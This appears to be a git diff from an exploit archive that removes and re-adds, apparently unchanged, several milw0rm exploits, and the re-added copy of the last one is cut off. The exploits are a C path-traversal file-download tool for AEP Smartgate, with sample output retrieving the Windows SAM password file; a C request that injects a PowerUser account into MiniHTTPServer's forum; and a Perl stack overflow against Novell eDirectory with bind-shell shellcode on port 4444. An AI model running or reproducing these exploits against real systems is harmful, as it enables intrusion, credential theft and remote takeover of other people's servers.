- * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f progra~1/v-one/smartgate/data -l sgusrdb.idx
- * [ AEP/Smartgate arbitrary file download exploit
- * [ Connected to www.target.com via (443/tcp)
- * [ Displaying raw HTTP response details
- * HTTP/1.0 301 Moved Permanently
- * Date: Tue Nov 22 16:53:11 GMT+00:00 2005
- * Location: /..\..\..\..\..\..\..\progra~1/v-one/smartgate/data/
- * Server: SSLSERVER/1.0
- * Content-Type: text/html
- * Expires: Now
- *
- * [ Exploit success, directory found
- *
- * A number of files/directories on win32 installations of smartgate may help the attacker further compromise
- * the VPN. Under unix installations the default root directory of smartgate is "/usr/smartgate" but may vary. 
- * 
- *  + progra~1/v-one/smartgate  - default directory for smartgate installation.
- *    + data                    - default directory for data files.
- *     - adm-gw.acl             - admin users are defined here.
- *     - reginfo.dat            - defines data entry fields for users.
- *     - sgate.acl              - access control for secured TCP services.
- *     - sgconf.ini             - dynamic information on the smartgate server including CA information.
- *     - sgusrdb.idx            - contains userid status,long name,group,auth key.
- *     - sweb.acl               - provides access control to webserver.
- *     - sweb.dny               - denies access to specified webservers.
- *  + winnt                     - common system root directory, varies.
- *   + repair                   - contains backup SAM file.
- *     - sam                    - backup of SAM file containing password hashes.
- *   + system32                 - common system32 directory, resides above %sysroot%
- *     - kernel32.dll           - detailed information of win32 version installed.
- *
- * Example.
- * Below is an example of exploit being used to retrieve the SAM password file in a real world attack. This
- * exploit is untested against unix implementations of smartgate but should function as expected with little
- * or no modification (char *http1). Tested against Smartgate V4.3B
- *
- * localhost 0day # gcc prdelka-vs-AEP-smartgate.c -o prdelka-vs-AEP-smartgate -lssl
- * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f winnt/repair/sam. -l sam
- * [ AEP/Smartgate arbitrary file download exploit
- * [ Connected to www.target.com via (443/tcp)
- * [ Displaying raw HTTP response details
- * HTTP/1.0 200 OK
- * Date: Tue Nov 22 17:06:00 GMT+00:00 2005
- * Content-type: text/plain
- * Content-length: 20480
- * Server: SSLSERVER/1.0
- * Expires: Now
- *
- * [ Exploit success, file found
- * [ Recieved 20480 byte(s) and saved as 'sam'
- * 
- * - prdelka
- */
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-int main(int argc,char *argv[])
-{
-    BIO * bio;
-    SSL * ssl;
-    SSL_CTX * ctx;
-    int p,c,fd,index = 0;
-    unsigned long size = 0;
-    int ihost = 0, iport = 0, ifile = 0, ilocal = 0, check = 0;
-    char *host,*request,*file,*connect,*port,*httpbuf,*httpbuf2;
-    char *http1 = "GET /..\\..\\..\\..\\..\\..\\..\\";
-    char *http2 = " HTTP/1.1\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A";
-    char r[1024];
-    static struct option options[]= {
-	    {"server", 1, 0, 's'},
-	    {"port", 1 , 0, 'p'},
-	    {"remotefile", 1, 0, 'f'},
-	    {"localfile", 1, 0, 'l'},
-	    {"help", 0, 0, 'h'}
-    };
-    printf("[ AEP/Smartgate arbitrary file download exploit\n");
-    while(c != -1)
-    {
-	    c = getopt_long(argc,argv,"s:p:f:l:h",options,&index);
-	    switch(c){
-		case -1:
-			    break;
-		case 's':
-			    host = malloc(strlen(optarg) + 1);
-			    sprintf(host,"%s",optarg);
-			    ihost = 1;
-			    break;
-		case 'p':
-			    port = malloc(strlen(optarg) + 1);
-			    sprintf(port,"%s",optarg);
-			    iport = 1;
-			    break;
-		case 'f':
-			    request = malloc(strlen(optarg) + strlen(http1) + strlen(http2) + 1);
-			    sprintf(request,"%s%s%s",http1,optarg,http2);
-			    ifile = 1;
-			    break;
-		case 'l':
-			    file = malloc(strlen(optarg) + 1);
-			    sprintf(file,"%s",optarg);
-			    ilocal = 1;
-			    break;
-		case 'h':
-			    printf("[\n[ %s\n",argv[0]);
-			    printf("[   --server|-s \n");
-			    printf("[   --port|-p \n");
-			    printf("[   --remotefile|-f \n");
-			    printf("[   --localfile|-l \n");
-			    printf("[\n[ For a more detailed explanation read the source\n");
-			    exit(0);
-			    break;
-		default:
-			    break;
-			    
-	    }
-    }
-    if(ihost != 1 || iport != 1 || ifile != 1 || ilocal != 1){
-	    printf("[ Try %s --help\n",argv[0]);
-	    exit(0);
-    }
-    ERR_load_BIO_strings();
-    SSL_load_error_strings();
-    OpenSSL_add_all_algorithms();
-    ctx = SSL_CTX_new(SSLv23_client_method());
-    bio = BIO_new_ssl_connect(ctx);
-    BIO_get_ssl(bio, & ssl);
-    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
-    connect = malloc(strlen(host) + strlen(port) + 2);
-    sprintf(connect,"%s:%s",host,port);
-    BIO_set_conn_hostname(bio, connect);
-    if(BIO_do_connect(bio) <= 0)
-    {
-        fprintf(stderr, "[ Error attempting to connect\n");
-        ERR_print_errors_fp(stderr);
-        BIO_free_all(bio);
-        SSL_CTX_free(ctx);
-        return 0;
-    }
-    printf("[ Connected to %s via (%s/tcp)\n",host,port);
-    BIO_write(bio, request, strlen(request));
-    check = 0;
-    httpbuf = malloc(2);
-    memset(httpbuf,0,2);
-    while(check == 0)
-    {
-    	p = BIO_read(bio, r, 1);
-    	r[p] = 0;
-	httpbuf2 = malloc(strlen(r) + strlen(httpbuf) + 1);
-    	sprintf(httpbuf2,"%s%s",httpbuf,r);
-	free(httpbuf);
-	httpbuf = httpbuf2;
-	check = (int)strstr(httpbuf,"\n\n");
-    }
-    printf("[ Displaying raw HTTP response details\n");
-    printf("%s",httpbuf);
-    check = 0;
-    check = (int)strstr(httpbuf,"200 OK");
-    if(check != 0)
-    {
-	printf("[ Exploit success, file found\n");
-    	fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
-    	if(fd == -1){
-		    printf("[ Error creating %s",file);
-		    exit(0);
-    	}
-    	for(;;)
-    	{
-       		p = BIO_read(bio, r, 1023);
-        	if(p <= 0) break;
-       	        r[p] = 0;
-		write(fd,r,p);
-		size = size + p;
-    	}
-	printf("[ Recieved %u byte(s) and saved as '%s'\n",size,file);
-	close(fd);
-    }
-    if(check==0)
-    {
-    	check = (int)strstr(httpbuf,"301 Moved");
-   	 if(check != 0)
-    	{
-		    printf("[ Exploit success, directory found\n");
-    	}
-    }
-    free(httpbuf);
-    if(check == 0)
-    {
-	    printf("[ Exploit failed\n");
-    }
-    BIO_free_all(bio);
-    SSL_CTX_free(ctx);
-    return 0;
-}
-
-// milw0rm.com [2006-10-24]
+/* prdelka-vs-AEP-smartgate
+ * ========================
+ * Smartgate is an application layer security gateway that meets FIPS 140-2
+ * requirements for large-scale networked environments for IP-based Networks.
+ * AEP provide network solutions for government, law enforcement, homeland security,
+ * public safety, criminal intelligence and much more.
+ * 
+ * A vulnerability exists in the smartgate SSL server (listens on port 443 by default)
+ * which may allow a malicious user to download arbitrary files with the priviledges
+ * of the smartgate server. 
+ *
+ * By analyzing the returned HTTP header response, an attacker can also test for the 
+ * existance of a remote directory. Remote directories return a "Moved Permanently" 
+ * error, as opposed to a 404, as shown below.
+ * 
+ * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f progra~1/v-one/smartgate/data -l sgusrdb.idx
+ * [ AEP/Smartgate arbitrary file download exploit
+ * [ Connected to www.target.com via (443/tcp)
+ * [ Displaying raw HTTP response details
+ * HTTP/1.0 301 Moved Permanently
+ * Date: Tue Nov 22 16:53:11 GMT+00:00 2005
+ * Location: /..\..\..\..\..\..\..\progra~1/v-one/smartgate/data/
+ * Server: SSLSERVER/1.0
+ * Content-Type: text/html
+ * Expires: Now
+ *
+ * [ Exploit success, directory found
+ *
+ * A number of files/directories on win32 installations of smartgate may help the attacker further compromise
+ * the VPN. Under unix installations the default root directory of smartgate is "/usr/smartgate" but may vary. 
+ * 
+ *  + progra~1/v-one/smartgate  - default directory for smartgate installation.
+ *    + data                    - default directory for data files.
+ *     - adm-gw.acl             - admin users are defined here.
+ *     - reginfo.dat            - defines data entry fields for users.
+ *     - sgate.acl              - access control for secured TCP services.
+ *     - sgconf.ini             - dynamic information on the smartgate server including CA information.
+ *     - sgusrdb.idx            - contains userid status,long name,group,auth key.
+ *     - sweb.acl               - provides access control to webserver.
+ *     - sweb.dny               - denies access to specified webservers.
+ *  + winnt                     - common system root directory, varies.
+ *   + repair                   - contains backup SAM file.
+ *     - sam                    - backup of SAM file containing password hashes.
+ *   + system32                 - common system32 directory, resides above %sysroot%
+ *     - kernel32.dll           - detailed information of win32 version installed.
+ *
+ * Example.
+ * Below is an example of exploit being used to retrieve the SAM password file in a real world attack. This
+ * exploit is untested against unix implementations of smartgate but should function as expected with little
+ * or no modification (char *http1). Tested against Smartgate V4.3B
+ *
+ * localhost 0day # gcc prdelka-vs-AEP-smartgate.c -o prdelka-vs-AEP-smartgate -lssl
+ * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f winnt/repair/sam. -l sam
+ * [ AEP/Smartgate arbitrary file download exploit
+ * [ Connected to www.target.com via (443/tcp)
+ * [ Displaying raw HTTP response details
+ * HTTP/1.0 200 OK
+ * Date: Tue Nov 22 17:06:00 GMT+00:00 2005
+ * Content-type: text/plain
+ * Content-length: 20480
+ * Server: SSLSERVER/1.0
+ * Expires: Now
+ *
+ * [ Exploit success, file found
+ * [ Recieved 20480 byte(s) and saved as 'sam'
+ * 
+ * - prdelka
+ */
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+int main(int argc,char *argv[])
+{
+    BIO * bio;
+    SSL * ssl;
+    SSL_CTX * ctx;
+    int p,c,fd,index = 0;
+    unsigned long size = 0;
+    int ihost = 0, iport = 0, ifile = 0, ilocal = 0, check = 0;
+    char *host,*request,*file,*connect,*port,*httpbuf,*httpbuf2;
+    char *http1 = "GET /..\\..\\..\\..\\..\\..\\..\\";
+    char *http2 = " HTTP/1.1\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A";
+    char r[1024];
+    static struct option options[]= {
+	    {"server", 1, 0, 's'},
+	    {"port", 1 , 0, 'p'},
+	    {"remotefile", 1, 0, 'f'},
+	    {"localfile", 1, 0, 'l'},
+	    {"help", 0, 0, 'h'}
+    };
+    printf("[ AEP/Smartgate arbitrary file download exploit\n");
+    while(c != -1)
+    {
+	    c = getopt_long(argc,argv,"s:p:f:l:h",options,&index);
+	    switch(c){
+		case -1:
+			    break;
+		case 's':
+			    host = malloc(strlen(optarg) + 1);
+			    sprintf(host,"%s",optarg);
+			    ihost = 1;
+			    break;
+		case 'p':
+			    port = malloc(strlen(optarg) + 1);
+			    sprintf(port,"%s",optarg);
+			    iport = 1;
+			    break;
+		case 'f':
+			    request = malloc(strlen(optarg) + strlen(http1) + strlen(http2) + 1);
+			    sprintf(request,"%s%s%s",http1,optarg,http2);
+			    ifile = 1;
+			    break;
+		case 'l':
+			    file = malloc(strlen(optarg) + 1);
+			    sprintf(file,"%s",optarg);
+			    ilocal = 1;
+			    break;
+		case 'h':
+			    printf("[\n[ %s\n",argv[0]);
+			    printf("[   --server|-s \n");
+			    printf("[   --port|-p \n");
+			    printf("[   --remotefile|-f \n");
+			    printf("[   --localfile|-l \n");
+			    printf("[\n[ For a more detailed explanation read the source\n");
+			    exit(0);
+			    break;
+		default:
+			    break;
+			    
+	    }
+    }
+    if(ihost != 1 || iport != 1 || ifile != 1 || ilocal != 1){
+	    printf("[ Try %s --help\n",argv[0]);
+	    exit(0);
+    }
+    ERR_load_BIO_strings();
+    SSL_load_error_strings();
+    OpenSSL_add_all_algorithms();
+    ctx = SSL_CTX_new(SSLv23_client_method());
+    bio = BIO_new_ssl_connect(ctx);
+    BIO_get_ssl(bio, & ssl);
+    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
+    connect = malloc(strlen(host) + strlen(port) + 2);
+    sprintf(connect,"%s:%s",host,port);
+    BIO_set_conn_hostname(bio, connect);
+    if(BIO_do_connect(bio) <= 0)
+    {
+        fprintf(stderr, "[ Error attempting to connect\n");
+        ERR_print_errors_fp(stderr);
+        BIO_free_all(bio);
+        SSL_CTX_free(ctx);
+        return 0;
+    }
+    printf("[ Connected to %s via (%s/tcp)\n",host,port);
+    BIO_write(bio, request, strlen(request));
+    check = 0;
+    httpbuf = malloc(2);
+    memset(httpbuf,0,2);
+    while(check == 0)
+    {
+    	p = BIO_read(bio, r, 1);
+    	r[p] = 0;
+	httpbuf2 = malloc(strlen(r) + strlen(httpbuf) + 1);
+    	sprintf(httpbuf2,"%s%s",httpbuf,r);
+	free(httpbuf);
+	httpbuf = httpbuf2;
+	check = (int)strstr(httpbuf,"\n\n");
+    }
+    printf("[ Displaying raw HTTP response details\n");
+    printf("%s",httpbuf);
+    check = 0;
+    check = (int)strstr(httpbuf,"200 OK");
+    if(check != 0)
+    {
+	printf("[ Exploit success, file found\n");
+    	fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
+    	if(fd == -1){
+		    printf("[ Error creating %s",file);
+		    exit(0);
+    	}
+    	for(;;)
+    	{
+       		p = BIO_read(bio, r, 1023);
+        	if(p <= 0) break;
+       	        r[p] = 0;
+		write(fd,r,p);
+		size = size + p;
+    	}
+	printf("[ Recieved %u byte(s) and saved as '%s'\n",size,file);
+	close(fd);
+    }
+    if(check==0)
+    {
+    	check = (int)strstr(httpbuf,"301 Moved");
+   	 if(check != 0)
+    	{
+		    printf("[ Exploit success, directory found\n");
+    	}
+    }
+    free(httpbuf);
+    if(check == 0)
+    {
+	    printf("[ Exploit failed\n");
+    }
+    BIO_free_all(bio);
+    SSL_CTX_free(ctx);
+    return 0;
+}
+
+// milw0rm.com [2006-10-24]
diff --git a/platforms/windows/remote/2651.c b/platforms/windows/remote/2651.c
index d531a9b7d..f609ee1c8 100755
--- a/platforms/windows/remote/2651.c
+++ b/platforms/windows/remote/2651.c
@@ -1,146 +1,146 @@
-/*================================================================
-
-MiniHTTPServer.NET 's Web Forum & File Sharing Server Power Pack 4
-(latest version available for sale on their website
-http://www.minihttpserver.net/bbs/index.php ) has multiple
-vulnerabilities with their join.asp page a malicious person could send manipulated data
-within the 'FrmMailBox' or 'FrmUserPass' field to add an unverified
-account to the system's user database or to manipulate existing users.
-
-This obviously could lead to information leaks on the server,
-sensitive information disclosure, or even system access and
-compromise.
-
-Discovered 10-25-2006 by Greg Linares
-Compiled in LCC-Win32
-
-==================================================================*/
-
-
-
-#include 
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib, "ws2_32")
-
-#define MAXBUF  1024
-
-int main(int argc, char *argv[])
-{
-	/* make sure this lowercase only username here is unique to the server - else exploit fails */
-
-	unsigned char ExploitStart[] =
-	"/join.asp?frmUserID=uniquerandomusername&frmUserPass=pwd1234&frmMailBox=me@blah.net";
-
-
-
-
-	unsigned char Exploit[] =
-	"\x3c\x2f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e\x3c"
-	"\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x31\x32\x33\x34"
-	"\x3c\x2f\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x3c"
-	"\x41\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e"
-	"\x50\x6f\x77\x65\x72\x55\x73\x65\x72\x3c\x2f\x41"
-	"\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e\x3c"
-	"\x45\x6d\x61\x69\x6c\x3e\x61\x40\x68\x65\x72\x65"
-	"\x2e\x6e\x65\x74";
-
-	WSADATA wsaData;
-	char *hostname;
-	struct hostent *hp;
-	int sockfd, bytes_read;
-	struct sockaddr_in sockin;
-    char buffer[MAXBUF];
-	char Exp[MAXBUF];
-
-	printf("\n=================================================================================\n");
-	printf("0-day MiniHTTPServer Web Forum & File Sharing Server 4.0 Add PowerUser Vulnerability \n");
-	printf("Proof Of Concept Code and Discovery by Greg Linares  \n", argv[0]);
-		exit(0);
-	}
-
-
-	hostname = argv[1];
-	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
-   	{
-    	fprintf(stderr, "Error setting up with WinSock v1.1\n");
-      	exit(-1);
-   	}
-
-
-
-	hp = gethostbyname(hostname);
-   	if (hp == NULL)
-   	{
-      	printf("ERROR: Uknown host %s\n", hostname);
-	  	printf("%s",hostname);
-      	exit(-1);
-   	}
-
-   	sockin.sin_family = AF_INET;
-   	sockin.sin_port = htons(80);
-   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
-
-   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Socket Error\n");
-      	exit(-1);
-   	}
-
-   	if ((connect(sockfd, (struct sockaddr *) &sockin,
-                sizeof(sockin))) == SOCKET_ERROR)
-   	{
-      	printf("ERROR: Connect Error\n");
-      	closesocket(sockfd);
-      	WSACleanup();
-      	exit(-1);
-   	}
-
-   	printf("Connected to [%s] on port [80], sending overflow....\n\n\n",
-          hostname);
-
-
-
-	memset(Exp, 0, 1024);
-	strcat(Exp, ExploitStart);
-	/* you can add more \r to create blank lines in the userlist (harder to read) */
-	strcat(Exp, "\r");
-	strcat(Exp, "\x3c\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e");
-   	strcat(Exp, strlwr(argv[2]));
-	strcat(Exp, Exploit);
-
-
-	memset(buffer, 0, 1024);
-    sprintf(buffer, "GET %s HTTP/1.0\n\n", Exp);
-    send(sockfd, buffer, strlen(buffer), 0);
-
-	/*
-	You can re-add this if you want to see the HTTP Response
-    do
-    {
-
-        bytes_read = recv(sockfd, buffer, sizeof(buffer), 0);
-        if ( bytes_read > 0 )
-            printf("%s", buffer);
-    }
-    while ( bytes_read > 0 );
-	*/
-
-	printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2]));
-	printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n");
-	WSACleanup();
-    return 0;
-}
-
-// milw0rm.com [2006-10-25]
+/*================================================================
+
+MiniHTTPServer.NET 's Web Forum & File Sharing Server Power Pack 4
+(latest version available for sale on their website
+http://www.minihttpserver.net/bbs/index.php ) has multiple
+vulnerabilities with their join.asp page a malicious person could send manipulated data
+within the 'FrmMailBox' or 'FrmUserPass' field to add an unverified
+account to the system's user database or to manipulate existing users.
+
+This obviously could lead to information leaks on the server,
+sensitive information disclosure, or even system access and
+compromise.
+
+Discovered 10-25-2006 by Greg Linares
+Compiled in LCC-Win32
+
+==================================================================*/
+
+
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib, "ws2_32")
+
+#define MAXBUF  1024
+
+int main(int argc, char *argv[])
+{
+	/* make sure this lowercase only username here is unique to the server - else exploit fails */
+
+	unsigned char ExploitStart[] =
+	"/join.asp?frmUserID=uniquerandomusername&frmUserPass=pwd1234&frmMailBox=me@blah.net";
+
+
+
+
+	unsigned char Exploit[] =
+	"\x3c\x2f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e\x3c"
+	"\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x31\x32\x33\x34"
+	"\x3c\x2f\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x3c"
+	"\x41\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e"
+	"\x50\x6f\x77\x65\x72\x55\x73\x65\x72\x3c\x2f\x41"
+	"\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e\x3c"
+	"\x45\x6d\x61\x69\x6c\x3e\x61\x40\x68\x65\x72\x65"
+	"\x2e\x6e\x65\x74";
+
+	WSADATA wsaData;
+	char *hostname;
+	struct hostent *hp;
+	int sockfd, bytes_read;
+	struct sockaddr_in sockin;
+    char buffer[MAXBUF];
+	char Exp[MAXBUF];
+
+	printf("\n=================================================================================\n");
+	printf("0-day MiniHTTPServer Web Forum & File Sharing Server 4.0 Add PowerUser Vulnerability \n");
+	printf("Proof Of Concept Code and Discovery by Greg Linares  \n", argv[0]);
+		exit(0);
+	}
+
+
+	hostname = argv[1];
+	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
+   	{
+    	fprintf(stderr, "Error setting up with WinSock v1.1\n");
+      	exit(-1);
+   	}
+
+
+
+	hp = gethostbyname(hostname);
+   	if (hp == NULL)
+   	{
+      	printf("ERROR: Uknown host %s\n", hostname);
+	  	printf("%s",hostname);
+      	exit(-1);
+   	}
+
+   	sockin.sin_family = AF_INET;
+   	sockin.sin_port = htons(80);
+   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);
+
+   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Socket Error\n");
+      	exit(-1);
+   	}
+
+   	if ((connect(sockfd, (struct sockaddr *) &sockin,
+                sizeof(sockin))) == SOCKET_ERROR)
+   	{
+      	printf("ERROR: Connect Error\n");
+      	closesocket(sockfd);
+      	WSACleanup();
+      	exit(-1);
+   	}
+
+   	printf("Connected to [%s] on port [80], sending overflow....\n\n\n",
+          hostname);
+
+
+
+	memset(Exp, 0, 1024);
+	strcat(Exp, ExploitStart);
+	/* you can add more \r to create blank lines in the userlist (harder to read) */
+	strcat(Exp, "\r");
+	strcat(Exp, "\x3c\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e");
+   	strcat(Exp, strlwr(argv[2]));
+	strcat(Exp, Exploit);
+
+
+	memset(buffer, 0, 1024);
+    sprintf(buffer, "GET %s HTTP/1.0\n\n", Exp);
+    send(sockfd, buffer, strlen(buffer), 0);
+
+	/*
+	You can re-add this if you want to see the HTTP Response
+    do
+    {
+
+        bytes_read = recv(sockfd, buffer, sizeof(buffer), 0);
+        if ( bytes_read > 0 )
+            printf("%s", buffer);
+    }
+    while ( bytes_read > 0 );
+	*/
+
+	printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2]));
+	printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n");
+	WSACleanup();
+    return 0;
+}
+
+// milw0rm.com [2006-10-25]
diff --git a/platforms/windows/remote/266.c b/platforms/windows/remote/266.c
index 848c8d452..c4cadb1c4 100755
--- a/platforms/windows/remote/266.c
+++ b/platforms/windows/remote/266.c
@@ -177,6 +177,6 @@ void usage()
   printf("Example: iishack2000 127.0.0.1 80 1\n");  
   exit(1);
 }
-
-
-// milw0rm.com [2001-05-07]
+
+
+// milw0rm.com [2001-05-07]
diff --git a/platforms/windows/remote/2671.pl b/platforms/windows/remote/2671.pl
index 7e58f5daf..fc9910b3e 100755
--- a/platforms/windows/remote/2671.pl
+++ b/platforms/windows/remote/2671.pl
@@ -1,100 +1,100 @@
-#!perl
-#
-# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
-#
-# Author:  Manuel Santamarina Suarez
-# e-Mail:  FistFuXXer@gmx.de
-#
-
-use IO::Socket;
-
-#
-# destination IP address
-#
-$ip = '192.168.1.25';
-
-#
-# destination TCP port
-#
-$port = 8028;
-
-#
-# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
-#
-$ret = reverse( "\x5F\x83\x3B\x7A" );  # CALL ESP
-                                      # MFC42U.5f833b7a
-
-#
-# 0x00, 0x0a, 0x0d, 0x3a free shellcode
-#
-# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-#
-$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-     "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-     "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-     "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-     "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
-     "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
-     "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57".
-     "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48".
-     "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38".
-     "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c".
-     "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-     "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48".
-     "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
-     "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38".
-     "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d".
-     "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58".
-     "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36".
-     "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
-     "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47".
-     "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
-     "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
-     "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30".
-     "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
-     "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54".
-     "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31".
-     "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a".
-     "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41".
-     "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42".
-     "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
-     "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d".
-     "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
-     "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45".
-     "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36".
-     "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c".
-     "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c".
-     "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52".
-     "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
-     "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
-     "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46".
-     "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46".
-     "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56".
-     "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
-     "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
-     "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d".
-     "\x4f\x4f\x42\x4d\x5a";
-
-print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";
-
-$sock = IO::Socket::INET->new
-(
-
-   PeerAddr => $ip,
-   PeerPort => $port,
-   Proto    => 'tcp',
-   Timeout  => 2
-
-) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
-
-print "[+] Connected.\n";
-print "[+] Trying to overwrite RETurn address...\n";
-
-$sock->send( "GET /nds HTTP/1.1\r\n" );
-$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" );
-
-print "[+] Done. Now check for bind shell on $ip:4444!";
-
-close( $sock );
-
-# milw0rm.com [2006-10-28]
+#!perl
+#
+# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit
+#
+# Author:  Manuel Santamarina Suarez
+# e-Mail:  FistFuXXer@gmx.de
+#
+
+use IO::Socket;
+
+#
+# destination IP address
+#
+$ip = '192.168.1.25';
+
+#
+# destination TCP port
+#
+$port = 8028;
+
+#
+# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free
+#
+$ret = reverse( "\x5F\x83\x3B\x7A" );  # CALL ESP
+                                      # MFC42U.5f833b7a
+
+#
